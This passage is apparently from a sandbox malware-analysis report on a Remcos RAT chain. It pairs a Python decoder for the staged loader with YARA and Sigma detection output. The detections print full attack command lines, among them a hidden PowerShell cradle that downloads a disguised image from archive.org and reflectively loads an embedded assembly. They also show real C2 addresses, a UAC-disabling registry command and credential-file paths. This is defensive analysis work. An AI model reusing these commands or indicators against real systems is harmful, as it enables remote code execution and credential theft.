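    """Mirror of [Text.Encoding]::Unicode.GetString(
    [Convert]::FromBase64String($Codigo.replace(token, 'A')))."""
    raw = base64.b64decode(blob.replace(placeholder, "A"), validate=True)
    return raw.decode("utf-16-le")


# --- Stage 2 (PID 2900) -------------------------------------------------------
START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"


def wrap_in_image(payload: bytes, prefix: bytes = b"\xff\xd8\xff\xe0") -> bytes:
    """Build a marker-wrapped 'image' as the staging server would (test input).
    The JPEG-looking prefix is constructed; only the markers matter."""
    return prefix + START_FLAG.encode() + base64.b64encode(payload) + END_FLAG.encode() + b"\n"


def extract_embedded_assembly(image: bytes) -> bytes:
    """Carve the base64 .NET assembly from between the markers.

    The sample evaluates '$startIndex -ge 0 -and $endIndex -gt $startIndex' as a
    bare expression, so its check never aborts; here a bad marker is an error."""
    text = image.decode("utf-8", errors="ignore")
    start = text.find(START_FLAG)
    end = text.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("base64 markers missing or out of order")
    start += len(START_FLAG)
    return base64.b64decode(text[start:end])


def is_pe(data: bytes) -> bool:
    """Cheap sanity check before handing bytes to any loader: DOS 'MZ' header."""
    return data[:2] == b"MZ"


def unreverse_url(arg: str) -> str:
    """The loader's first argument is the payload URL written backwards."""
    return arg[::-1]


# --- Remcos config: "Host:Port:Password" --------------------------------------
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Entries are concatenated with no delimiter, so split where the next IPv4
# followed by ':' begins, or at end of string. The lazy password match makes a
# numeric password ambiguous when it could also start an IPv4; check by hand.
ENTRY_RE = re.compile("(" + IPV4 + r"):(\d{1,5}):(.+?)(?=" + IPV4 + ":|$)")


def split_c2_entries(field: str) -> List[Tuple[str, int, str]]:
    return [(ip, int(port), pw) for ip, port, pw in ENTRY_RE.findall(field)]


if __name__ == "__main__":
    # Constructed stand-in for the real stage-2 script; the URL is a placeholder.
    stage2 = "$imageUrl = 'https://example.invalid/vbs.jpg';$webClient = New-Object System.Net.WebClient"
    blob = build_stage1_blob(stage2)
    print(blob[:40])  # J#@#Bp#@#G0#@#YQBn... matching the report's J?Bp?G0?YQBn...
    print(decode_stage1(blob) == stage2)
    print(unreverse_url("txt.VGGR/006/822.18.21.891//:ptth"))
    print(split_c2_entries("192.3.101.172:2404:1192.3.101.172:9674:1"))
```

Run as a script it prints the obfuscated prefix, the round-trip result, the normalised payload URL and the two C2 tuples. The stage-1 prefix `J#@#Bp#@#G0#@#YQBn` lines up with the report's `J?Bp?G0?YQBn`, which is how an analyst confirms that the placeholder stands for a single 'A' and that the script begins with `$imageUrl`.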
Yara matches (dropped files)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
  • 0xc09:$obj2: \objdata
  • 0xbf3:$obj3: \objupdate
  • 0xbcf:$obj4: \objemb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
  • 0xc09:$obj2: \objdata
  • 0xbf3:$obj3: \objupdate
  • 0xbcf:$obj4: \objemb
Yara matches (memory dumps)

Source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
(22 further entries not shown)
Yara matches (unpacked PEs)

Source: 14.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 14.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 14.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 14.2.RegAsm.exe.400000.0.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
Source: 14.2.RegAsm.exe.400000.0.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
(19 further entries not shown)

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 198.12.81.228, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3096, TargetFilename: C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3096, Protocol: tcp, SourceIp: 198.12.81.228, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                  Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3604, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , ProcessId: 3208, ProcessName: wscript.exe
                  Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3604, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , ProcessId: 3208, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? 
? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton, Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3604, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 2496, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg", ProcessId: 1908, ProcessName: RegAsm.exe
                  Source: Network Connection, Author: X__Junior (Nextron Systems), Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3604, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
